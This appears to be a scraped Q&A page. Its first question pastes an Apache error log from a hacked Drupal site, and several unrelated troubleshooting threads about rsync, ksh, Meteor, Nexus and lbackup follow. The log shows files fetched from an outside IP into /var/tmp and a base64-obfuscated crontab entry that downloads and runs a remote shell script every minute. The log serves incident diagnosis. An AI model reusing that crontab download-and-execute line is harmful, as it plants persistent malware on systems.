Drupla Site hacked - drupal

apache server error_log:
--2018-11-14 22:13:39-- http://164.132.159.56/drupal/zps.sh
Connecting to 164.132.159.56:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 589 [text/x-sh]
Saving to: 'STDOUT'
0K 100% 101M=0s
2018-11-14 22:13:40 (101 MB/s) - written to stdout [589/589]
rm: cannot remove '/var/tmp/yum-ec2-user-_j9uM3': Operation not permitted
rm: refusing to remove '.' or '..' directory: skipping '/var/tmp/.'
rm: refusing to remove '.' or '..' directory: skipping '/var/tmp/..'
--2018-11-14 22:13:40-- http://164.132.159.56/drupal/2/olo
Connecting to 164.132.159.56:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 33880 (33K)
Saving to: '/var/tmp/lew'
0K .......... .......... .......... ... 100% 286K=0.1s
2018-11-14 22:13:40 (286 KB/s) - '/var/tmp/lew' saved [33880/33880]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
^M 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0^M100 33880 100 33880 0 0 96119 0 --:--:-- --:--:-- --:--:-- 96250
e: No such file or directory
e: No such file or directory
e: No such file or directory
e: No such file or directory
e: No such file or directory
e: No such file or directory
e: No such file or directory
e: No such file or directory
e: No such file or directory
sh: line 1: 22417 Done echo '* * * * * echo -n "d2dldCAtTyAtIGh0dHA6Ly8xNjQuMTMyLjE1OS41Ni9kcnVwYWwvei5zaHxzaA==" | base64 -d |sh > /dev/null'
22418 Killed | crontab -
e: No such file or directory
e: No such file or directory
e: No such file or directory
e: No such file or directory
Please tell solution.

Use Hacked module (https://www.drupal.org/project/hacked) for your site.
It will give you report for all files which has been changed recently.
You can either delete those files or resolve their coding.

Related

Rsync not transferring files and no errors

So I have files on the server that I'm trying to copy over. I tried doing it to grab by the folder with:
rsync -avzh --stats deploy#website.com:/data/deploy/website/releases/20200309193449/files
I even tried just getting a particular file with:
rsync -avz --stats deploy#website.com:/data/deploy/website/releases/20200309193449/files/28/ImportantFile.doc
The file is returning:
-rw-rw-r-- 48640 2020/04/08 15:13:42 ImportantFile.doc
Number of files: 1
Number of files transferred: 0
Total file size: 48640 bytes
Total transferred file size: 0 bytes
Literal data: 0 bytes
Matched data: 0 bytes
File list size: 79
File list generation time: 0.001 seconds
File list transfer time: 0.000 seconds
Total bytes sent: 16
Total bytes received: 103
The difference when I try to copy the folder I get the following permissions on the folder:
drwxrwxr-x 4096 2020/04/08 15:13:42 files
Am I missing something? Is there some additional permission I should be putting in the rsync?
Leaving this here in hopes that someone will get a benefit from my stupidity. Threw a space . at the end of like so:
rsync -avzh --stats deploy#website.com:/data/deploy/website/releases/20200309193449/files .
I hope this benefits someone eventually.

mpack command in ksh script, ftp file first from windows

WORK_FILE=RetriesExceeded.csv
MAIL="test#test.org"
HOST=lawsonfax
$FTP -v "$HOST" << EOF
get RetriesExceeded.csv
quit
EOF
archive_file $WORK_FILE
/law/bin/mpack -s 'Fax Retries Exceeded' "$WORK_FILE" "$MAIL"
log_stop
exit 0
Newest error at bottom, no such file or directory: [dgftp#lawapp2]/lawif/bin$ get_lawson_fax.ksh
Connected to lawsonfax.phsi.promedica.org.
220 Microsoft FTP Service
331 Password required for dgftp.
230 User logged in.
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
352 bytes received in 0.04171 seconds (8.242 Kbytes/s)
local: RetriesExceeded.csv remote: RetriesExceeded.csv
221 Goodbye.
RetriesExceeded.csv: No such file or directory
[dgftp#lawapp2]/lawif/bin$
The last command now:
CMD="/law/bin/mpack -s 'Fax Retries Exceeded' $WORK_FILE $MAIL"
Suggested change:
/law/bin/mpack -s 'Fax Retries Exceeded' "$WORK_FILE" "$MAIL"
Of course only if you actually have such /law/bin/mpack program.

Meteor Error using npm-container package on deployment time

I am using meteor 1.2.1 version.
I want to used node js package in meteor, So i add npm-container meteor package .
But after adding this package in meteor project, this give the below error on deployment time(mup deploy).
[101.100.1.200] - Invoking deployment process
[101.100.1.200] x Invoking deployment process: FAILED
-----------------------------------STDERR-------------------------------
RN package.json meteor-dev-bundle#0.0.0 No repository field.
npm WARN package.json meteor-dev-bundle#0.0.0 No README data
../src/coroutine.cc: In function `void* find_thread_id_key(void*)':
../src/coroutine.cc:64:53: warning: comparison of unsigned expression >=
0 is always true [-Wtype-limits]
for (pthread_key_t ii = coro_thread_key - 1; ii >= 0; --ii) {
^
../src/coroutine.cc:90:3: warning: `thread_id' may be used uninitialized
in this function [-Wmaybe-uninitialized]
if (tls == thread_id) {
^
js-bson: Failed to load c++ bson extension, using pure JS version
% Total % Received % Xferd Average Speed Time Time Time
Current
Dload Upload Total Spent Left
Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0cu
rl: (7) Failed to connect to localhost port 8456: Connection refused
Latest deployment failed! Reverted back to the previous version.
-----------------------------------STDOUT-------------------------------
lk#0.5.1 node_modules/chalk
escape-string-regexp#1.0.3 node_modules/escape-string-regexp
supports-color#0.2.0 node_modules/supports-color
has-ansi#0.1.0 node_modules/has-ansi
strip-ansi#0.3.0 node_modules/strip-ansi
eachline#2.3.3 node_modules/eachline
type-of#2.0.1 node_modules/type-of
amdefine#1.0.0 node_modules/amdefine
asap#2.0.3 node_modules/asap
underscore#1.5.2 node_modules/underscore
meteor-promise#0.5.0 node_modules/meteor-promise
promise#7.0.4 node_modules/promise
source-map-support#0.3.2 node_modules/source-map-support
semver#4.1.0 node_modules/semver
source-map#0.1.32 node_modules/source-map
fibers#1.0.5 node_modules/fibers
Waiting for MongoDB to initialize. (5 minutes)
{ [Error: Cannot find module '../build/Release/bson'] code: 'MODULE_NOT_
FOUND' }
connected
Project-Name stop/waiting
Project-Name start/running, process 23426
Waiting for 100 seconds while app is booting up
Checking is app booted or not?
Project-Name stop/waiting
Project-Name start/running, process 25162

Unable to download large files from Sonatype Nexus

Nexus version 3.1.0-04
During a build, I receive the following error downloading an artifact from Nexus.
Download >http://10.148.254.17:8081/nexus/content/repositories/central/org/assertj/assertj-core/2.4.1/assertj-core-2.4.1.jar
:collection:extractIncludeTestProto FAILED
FAILURE: Build failed with an exception.
What went wrong:
Could not resolve all dependencies for configuration ':collection:testCompile'.
Could not download assertj-core.jar (org.assertj:assertj-core:2.4.1)
Could not get resource 'http://xxx.xxx.xxx.xxx:8081/nexus/content/repositories/central/org/assertj/assertj-core/2.4.1/assertj-core-2.4.1.jar'.
Premature end of Content-Length delimited message body (expected: 900718; received: 6862
This appear to be a problem with large files stored in Nexus.
If I try and download the file via wget or curl, it also fails.
c:>wget http://xxx.xxx.xxx.xxx:8081/nexus/content/repositories/central/org/assertj/assertj-core/2.5.0/assertj-
core-2.5.0.jar
--13:57:06-- >http://xxx.xxx.xxx.xxx:8081/nexus/content/repositories/central/org/assertj/assertj-core/2.5.0/assertj-core-2.5.0.jar
=> `assertj-core-2.5.0.jar'
Resolving proxy.xxxx.com... done.
Connecting to proxy.xxxx.com[xxx.xxx.xxx.xxx]:xxx... connected.
Proxy request sent, awaiting response... 200 OK
Length: 934,446 [application/java-archive]
0% [ ] 6,856 1.44K/s ETA 10:27
13:57:21 (1.44 KB/s) - Connection closed at byte 6856. Retrying.
c:>curl -O http://xxx.xxx.xxx.xxx:8081/nexus/content/repositories/central/org/assertj/assertj-core/2.5.0/assertj-core-2.5.0.jar
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 912k 0 6862 0 0 613 0 0:25:24 0:00:11 0:25:13 613
curl: (18) transfer closed with 927584 bytes remaining to read
Any ideas why?
In my case by docker layer was blocked. I solved this problem by changing the timeout in System>Http>Connection/Socket timeout.

How do lbackup backup remote files with root previllege, and without root ssh login?

Well, I currently use lbackup to backup files on my remote server. So I logged in with my account, which is NOT root.
And I got below errors, obviously, my account is NOT www-data.
Any suggestions?
$ ls -l /var/www/cache |grep cache
drwx------ 13 www-data www-data 4096 Jul 28 06:27 cache
Sun Jul 28 23:53:17 CST 2013
Hard Links Enabled
Synchronizing...
Creating Links
rsync: opendir "/var/www/bbs/cache" failed: Permission denied (13)
IO error encountered -- skipping file deletion
rsync: opendir "/var/www/bbs/files" failed: Permission denied (13)
rsync: opendir "/var/www/bbs/store" failed: Permission denied (13)
rsync: send_files failed to open "/var/www/bbs/config.php": Permission denied (13)
Number of files: 10048
Number of files transferred: 1919
Total file size: 202516431 bytes
Total transferred file size: 16200288 bytes
Literal data: 16200288 bytes
Matched data: 0 bytes
File list size: 242097
File list generation time: 0.002 seconds
File list transfer time: 0.000 seconds
Total bytes sent: 39231
Total bytes received: 5617302
sent 39231 bytes received 5617302 bytes 50731.24 bytes/sec
total size is 202516431 speedup is 35.80
rsync error: some files/attrs were not transferred (see previous errors) (code 23) at main.c(1536) [generator=3.0.9]
WARNING! : Data Transfer Interrupted
WARNING! : No mail configuration partner specified.
To specify a mail partner configuration file add the
following line into your backup configuration file :
mailconfigpartner=nameofyourmailpartner.conf
you have two possibilities:
a) ignore the files you cannot read (--exclude=PATTERN)
b) get read persmissions for these files, either by logging in as another user or by chmod-ing the files, whatever is appropriate

Resources